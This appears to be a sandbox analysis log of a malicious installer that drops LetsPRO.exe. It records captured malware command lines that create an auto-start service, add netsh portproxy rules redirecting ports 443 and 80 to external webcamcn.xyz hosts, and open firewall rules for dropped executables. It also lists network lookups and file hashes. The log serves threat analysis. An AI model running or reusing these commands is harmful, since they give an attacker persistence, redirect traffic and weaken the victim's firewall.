C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Windows\system32\cscript.exe
cscript C:\Users\Admin\57296\572960.vbs
C:\Windows\system32\cmd.exe
cmd /c cscript C:\Users\Admin\57296\572960.vbs
C:\Windows\system32\cscript.exe
cscript C:\Users\Admin\57296\572960.vbs
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe cscript C:\Users\Admin\57296\572960.vbs
C:\Windows\system32\sc.exe
sc create 572960607 binPath= "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" type= own start= auto displayname= 572960607
C:\Windows\system32\netsh.exe
netsh interface portproxy add v4tov4 listenport=443 connectaddress=103.214.147.31.webcamcn.xyz connectport=443
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Safe1" dir=in action=allow program="C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Safe2" dir=in action=allow program="C:\Users\GameSafe.exe"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Safe3" dir=in action=allow program="C:\Users\GameSafe2.exe"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Safe4" dir=in action=allow program="C:\Users\GameSafe3.exe"
C:\Windows\system32\netsh.exe
netsh interface portproxy add v4tov4 listenport=80 connectaddress=hm2.webcamcn.xyz connectport=80
C:\Windows\system32\taskkill.exe
taskkill /f /t /im wegame.exe
C:\Windows\system32\taskkill.exe
taskkill /f /t /im WeGame.exe
C:\Program Files (x86)\WeGame\WeGame.exe
"C:\Program Files (x86)\WeGame\WeGame.exe"
C:\Program Files (x86)\WeGame\WeGame.exe
"C:\Program Files (x86)\WeGame\WeGame.exe"
C:\Program Files (x86)\WeGame\WeGame.exe
"C:\Program Files (x86)\WeGame\WeGame.exe"
C:\Program Files (x86)\WeGame\WeGame.exe
"C:\Program Files (x86)\WeGame\WeGame.exe"
C:\Program Files (x86)\WeGame\WeGame.exe
"C:\Program Files (x86)\WeGame\WeGame.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 127.0.0.1:443 | tcp | |
| US | 8.8.8.8:53 | ied-tqos.wegamex.com.hk | udp |
| US | 8.8.8.8:53 | 103.214.147.31.webcamcn.xyz | udp |
| US | 8.8.8.8:53 | ied-tqos.wegamex.com.hk | udp |
| N/A | 127.0.0.1:443 | tcp | |
| N/A | 127.0.0.1:443 | tcp | |
| US | 8.8.8.8:53 | 103.214.147.31.webcamcn.xyz | udp |
| US | 8.8.8.8:53 | ied-tqos.wegamex.com.hk | udp |
| N/A | 127.0.0.1:443 | tcp | |
| US | 8.8.8.8:53 | 103.214.147.31.webcamcn.xyz | udp |
| N/A | 127.0.0.1:443 | tcp | |
| N/A | 127.0.0.1:443 | tcp | |
| N/A | 127.0.0.1:443 | tcp | |
| US | 8.8.8.8:53 | 103.214.147.31.webcamcn.xyz | udp |
| N/A | 127.0.0.1:443 | tcp | |
| US | 8.8.8.8:53 | ied-tqos.wegamex.com.hk | udp |
| N/A | 127.0.0.1:443 | tcp | |
| US | 8.8.8.8:53 | 103.214.147.31.webcamcn.xyz | udp |
| N/A | 127.0.0.1:443 | tcp | |
| N/A | 127.0.0.1:443 | tcp | |
| N/A | 127.0.0.1:443 | tcp | |
| US | 8.8.8.8:53 | 103.214.147.31.webcamcn.xyz | udp |
| N/A | 127.0.0.1:443 | tcp | |
| US | 8.8.8.8:53 | ied-tqos.wegamex.com.hk | udp |
| N/A | 127.0.0.1:443 | tcp | |
| US | 8.8.8.8:53 | ied-tqos.wegamex.com.hk | udp |
| N/A | 127.0.0.1:443 | tcp | |
| US | 8.8.8.8:53 | 103.214.147.31.webcamcn.xyz | udp |
Files
C:\Users\Admin\AppData\Roaming\Install\Install 6.1.9\install\Install.msi
| MD5 | 524c6546d99286d1a37ac9499035ceb9 |
| SHA1 | a0562541157d99adefc804c6079f33395c0b9d62 |
| SHA256 | 0cfef8ba27e2a2527be9675167659186c94dd4b0986aec491ccaa9ed213a4b0e |
| SHA512 | 26fdff49ac156b64b26bb42fa46917f379ed32d6849603bb5d08156c1ded509ee3c05d2f91d3a95707b05cb6c02b94ef2c03becc6f67b88c2c51e04ae0420491 |
C:\Windows\Installer\MSI7465.tmp
| MD5 | 6119e62d8047032a715ba0670fc476c5 |
| SHA1 | 52e639024460bf111c469e95fb011c07d6fc89e8 |
| SHA256 | bc31f85266df2cdfdbe22149937105388fa3adc17e3646fa4a167736e819af77 |
| SHA512 | e7301fa21f01f7f7562b853e9bb246ed051951e3cef152bb0b3558d4863f141edbbc0c4d439c30f51f9997805490f131a5e4cd00872b61ccb08ba9d200f811d8 |
\??\Volume{8ccc3c3f-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{d6b7a98f-f584-4203-bc19-c25c9403d0b2}_OnDiskSnapshotProp
| MD5 | c1945ca6657a5a16a1bff02d1a6efd48 |
| SHA1 | 2ef198bf8c293b5b0f15196923298d7a09f67ba8 |
| SHA256 | 4ad1858147120c182287980c238491554b4a3631ed7c1ab08e5c060a5a1082ba |
| SHA512 | 34f80ac9717da87709579999615a8026ca3eef3045dde47f990eb6c6c970ed424fb7ecff9dc3907b68fae1abc2811443671eb1df35dc76cc3002de7c714f910d |
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
| MD5 | b3e51a96b9128e002855b1360c26bbf8 |
| SHA1 | f8f2525b545a6e93b71264c43ead47d1a35f1b10 |
| SHA256 | 01b32f008c166845edf4adf8121cc13fb3998cd9c38ba788ac600c86424f3374 |
| SHA512 | dfdcc13b4ca86041e9fc606e660c07032c94fbbbdde876d637c4c48987983c16d7c858a18b93c4fd15ec6d66a6ff2a9887c021c2ff6d4ce3055d92b4e11ccdcd |
C:\Users\Admin\AppData\Roaming\Install\Install 6.1.9\install\Install1.cab
| MD5 | f1d5b53ebd72aa0372c5fc828d8794b3 |
| SHA1 | 4767a942af65c3d8366767f14a69d6192697e608 |
| SHA256 | 1e5b1dc6447932530edff0da158fa675324f4de502e85a2c8e89f566a9782312 |
| SHA512 | d22575da0c646f11135f87d377306dbe766be5101df332dae28ce7a7b8bdd7e0ff6878269ed83299a02c192a6e556ce117a23c52fdca0942332332160afbf6f7 |
C:\Windows\Installer\MSI7A62.tmp
| MD5 | e7e51805794e1a71c5e2bdd45f4ee5c9 |
| SHA1 | d178d4c1deb28018a180ac3a6182e923660e16f5 |
| SHA256 | f6216d72f4d9a7d46f3b878650b2f26982e4f05b8b5ce363a60c564159db781f |
| SHA512 | 5632ceae01b6aad3d806bcdf2bdaf40e487cb3dc48d83597429dc4e9c5867a878a87ca06c3a2e43e8fc532295b5b8efbb472bd07c33f6b6629e877e3392eb576 |
C:\Windows\Installer\MSI7B7C.tmp
| MD5 | 0901970c2066aed8a97d75aaf1fd3146 |
| SHA1 | f0c700a4bfcebad9843e01a88bab71b5f38996d8 |
| SHA256 | 41f827e6addfc71d68cd4758336edf602349fb1230256ec135121f95c670d773 |
| SHA512 | 00e12fd2d752a01dfa75550ffaf3a2f337171cec93cd013083c37137a455e93bebd72e7d8487ec3e1de5fe22994f058829a6597765612278c20d601192cbe733 |
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
| MD5 | 93eadcdc2b275d749a70ccf1774e1bff |
| SHA1 | 444ec11e3d9512d2cba98a87b6d52a61c2c9f861 |
| SHA256 | 04aba1938bf72c36aad374fe2415e0fd0bc656d0cd5b53561c9defed40e40e35 |
| SHA512 | cbefaafcc85b6f1520c8b5610b8ef83fef54b80d35113fd138c7e1c03dfc411f49ee4cd2d0d5dc53920748ce68609843e20370f6ee2c7be5c4008e4928052a70 |
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
| MD5 | 7bb188dfee179cbde884a0e7d127b074 |
| SHA1 | af351d674ec8515b4363b279c5ef803f7a4a3618 |
| SHA256 | 7c3308f04df19ecaa36818c4a49348e1d6921a43df5c53cb8131cc58e92889ed |
| SHA512 | 45df588d45cad6bce5dfb48626d7505140ec1c1beecb97e3f9393cb90a144ca09c1a4d4ded75fce18ac3c7dc6f5ca0b222574222bd746d60cb6068ef910a5c4b |
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcr100.dll
| MD5 | ef3e115c225588a680acf365158b2f4a |
| SHA1 | ecda6d3b4642d2451817833b39248778e9c2cbb0 |
| SHA256 | 25d1cc5be93c7a0b58855ad1f4c9df3cfb9ec87e5dc13db85b147b1951ac6fa8 |
| SHA512 | d51f51336b7a34eb6c8f429597c3d685eb53853ee5e9d4857c40fc7be6956f1b8363d8d34bebad15ccceae45a6eb69f105f2df6a672f15fb0e6f8d0bb1afb91a |
memory/1856-93-0x0000000010000000-0x0000000010F82000-memory.dmp
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\1
| MD5 | 4d67c8f5ef8e40ad72add9ffd22e4abc |
| SHA1 | c55b71338b5ae5129fa8d39628a34f320dacc8af |
| SHA256 | 6222b03d83e0e82c8aa6c9e530af61cfa850a089db0321d921d759a55b5ee0fb |
| SHA512 | 5470a5a2a75fc30df6697c6adac40be79fae82103e5f001625dc929d1044d3d91f63243a1c8c73c6f89312fc4a2bfd5d761a06ef478ce535358d095f2cff6712 |
C:\Config.Msi\e5773bc.rbs
| MD5 | 0db7e56ed8ffaa6fbc2f30c15267f94c |
| SHA1 | 857db1d4628c471de8cf3ec811539c398554cdfa |
| SHA256 | 4fa204893aeaefa3cba1fcd2e1a289ecf1e756d6db66208df27fbf93d844a3d7 |
| SHA512 | 43ab03515fbd9495507f4f6164228305ae9077124af134bd66ebad3fcc21041771e92a7a9b1614a37b8af513181782fa6c1131da7b0469d2234a81424212dbd6 |
memory/1856-148-0x0000000010000000-0x0000000010F82000-memory.dmp
memory/1856-146-0x0000000001FD0000-0x0000000001FD1000-memory.dmp
memory/2624-164-0x0000000010000000-0x0000000010F82000-memory.dmp
memory/1652-174-0x0000000000570000-0x0000000000571000-memory.dmp
memory/1652-175-0x0000000010000000-0x0000000010F82000-memory.dmp
memory/232-173-0x0000000010000000-0x0000000010F82000-memory.dmp
memory/2428-167-0x0000000010000000-0x0000000010F82000-memory.dmp
memory/232-170-0x0000000000520000-0x0000000000521000-memory.dmp
memory/2428-166-0x0000000001F90000-0x0000000001F91000-memory.dmp
memory/1964-159-0x0000000010000000-0x0000000010F82000-memory.dmp
memory/1964-158-0x00000000004A0000-0x00000000004A1000-memory.dmp
memory/3620-154-0x0000000000590000-0x0000000000591000-memory.dmp
memory/3620-157-0x0000000010000000-0x0000000010F82000-memory.dmp
memory/5012-151-0x0000000010000000-0x0000000010F82000-memory.dmp
memory/5012-150-0x0000000001FF0000-0x0000000001FF1000-memory.dmp
C:\Users\Admin\57296\572960.vbs
| MD5 | a3faafa977df67557e6b968ae4b84dc8 |
| SHA1 | 9448f6aff049e7dd4fe314a927d84b60a36e7463 |
| SHA256 | 8b91fbed673d06601a81ebbc98a4bb2572fc7913bc189e6870ee5684afc2b787 |
| SHA512 | c31fa17f9249ac1f0f80306444e6f466628f0368c7b13592d4ee4e99fd93cc1b015990cad0091b6938b5ca6b814fe3da17ad7819be28aa63a602958ece00dbeb |
memory/1640-201-0x0000028F28B20000-0x0000028F28B42000-memory.dmp
C:\Windows\Temp\__PSScriptPolicyTest_053wmv3v.poa.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Program Files (x86)\WeGame\WeGame.exe
| MD5 | 063af51c19f29bcdfd26c1bebdc9ace6 |
| SHA1 | 810817459e322ba44815df62702b9c8fe04b26fb |
| SHA256 | c6ef12669e1d0a3d0f54ad7cd516d5cf2ddf81edc350c3aafaa51c8ea9226a73 |
| SHA512 | 5ffff7f49b68004eb8f02522724b45d9c6cfa5cb45ff1c5f3cd93f1c65f0cadc322cc09a777b933c64650a7666c6204b67f9b1adf266ba2d1ce537c17f4a99a9 |
C:\Program Files (x86)\WeGame\adapt_for_imports.dll
| MD5 | d9f36ff27dc0d08fd384a99bb801a24a |
| SHA1 | 886287b85e2b57e05e61ee582dd1595f7e620765 |
| SHA256 | 96aea19b11327ae4200396e84f06a4746a926f43b688c22e60b370ded1cf6d58 |
| SHA512 | 032f0f0e6200383dd9a4a7628e1ef5b67ea6fcfd3a872cd2fa0b952ccc3286b10550526c01e0294068e7d3995714efdf798607a51cf4681b8295b8d8493963dd |
C:\Program Files (x86)\WeGame\common.dll
| MD5 | 856d1285704805940b8379e81b18f3eb |
| SHA1 | aae6852e7f86a8163ca5a63178a7cceb1c50ff67 |
| SHA256 | 2e21f70adcbe5fe3d51eb9236fc23e071e675c802bfeec2ca5c0a41eef35e9a2 |
| SHA512 | 50b61c980c176f2f32bd4e353187d5db9f3d3d7d01486105da95d7e7bf153386d2808dc94909b4998e05accebe6cc388ecad8246d236a89529f9a1274b34885c |
C:\Program Files (x86)\WeGame\beacon_sdk.dll
| MD5 | c83dd90d61bae5cf1d4b0620649726d6 |
| SHA1 | cdb21af237425523d230a1738c4111776b3e8318 |
| SHA256 | b5df19432f50ad434ca860173c9eb0dc6fdfaca48f75a3b416d038c213d089da |
| SHA512 | 480cb660931eece9fee17fcb60b5c467ceb033d7d2f9fc0cf37b82dbc7443918935ba5a24aaeb8a284c95820eccab382e67342e6f0038c4d36b36f51d04dc412 |
C:\Program Files (x86)\WeGame\Lua51.dll
| MD5 | 0527df9bdaaea7250291efcb5b33b709 |
| SHA1 | 1b6b3511c30aa66a0a0258578a4b695db2fbde36 |
| SHA256 | 7fa367a644670ed94a01bc0927996d93b82ea2658bb7d84c99c648f12b6a61f1 |
| SHA512 | d8f49f954112e744b161246759aa0a6b106125a9b936e98c3f57c4535b1e7866adffe3e1699412ef8d549a84121f9492f67bb504b91fffd384bbc2e89611631b |